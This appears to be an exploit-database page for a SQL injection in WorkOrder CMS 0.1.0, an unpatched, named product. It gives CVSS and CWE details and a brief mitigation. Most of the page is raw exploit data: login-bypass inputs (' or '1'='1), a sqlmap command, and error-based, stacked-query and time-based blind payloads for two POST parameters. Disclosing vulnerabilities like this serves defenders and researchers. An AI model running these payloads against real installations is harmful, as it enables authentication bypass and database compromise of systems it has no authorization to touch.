header-logo
Suggest Exploit
vendor:
WorkOrderCMS
by:
Chokri Hammedi
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WorkOrderCMS
Affected Version From: 0.1.0
Affected Version To: 0.1.0
Patch Exists: NO
Related CWE:
CPE: a:romzes13:workordercms:0.1.0
Metasploit:
Other Scripts:
Platforms Tested: Linux
2022

WorkOrder CMS 0.1.0 – SQL Injection

WorkOrder CMS 0.1.0 is vulnerable to SQL Injection. An attacker can bypass authentication by using username: ' or '1'='1 and password: ' or '1'='1. Additionally, an attacker can use error-based, stacked queries, and time-based blind payloads to exploit the vulnerability. The payloads are: error-based: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/, stacked queries: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/, and time-based blind: userName=1'='1&password=1/' AND (SELECT 6822 FROM (SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/.

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: WorkOrder CMS 0.1.0 - SQL Injection
# Date: Sep 22, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS
# Software Link: https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip
# Version: 0.1.0
# Tested on: Linux

# Auth Bypass:


username:' or '1'='1

password:' or '1'='1


#sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql


# POST Requests:


Parameter: #1* ((custom) POST)

    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)

    Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECT
COUNT(*),CONCAT(0x7170627071,(SELECT
(ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/


    Type: stacked queries

    Title: MySQL >= 5.0.12 stacked queries (comment)

    Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/


    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM
(SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/


Parameter: #2* ((custom) POST)

    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)

    Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECT
COUNT(*),CONCAT(0x7170627071,(SELECT
(ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/


    Type: stacked queries

    Title: MySQL >= 5.0.12 stacked queries (comment)

    Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/


    Type: time-based blind

    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)

    Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/

Navigation

Suggest Exploit

Services By CQR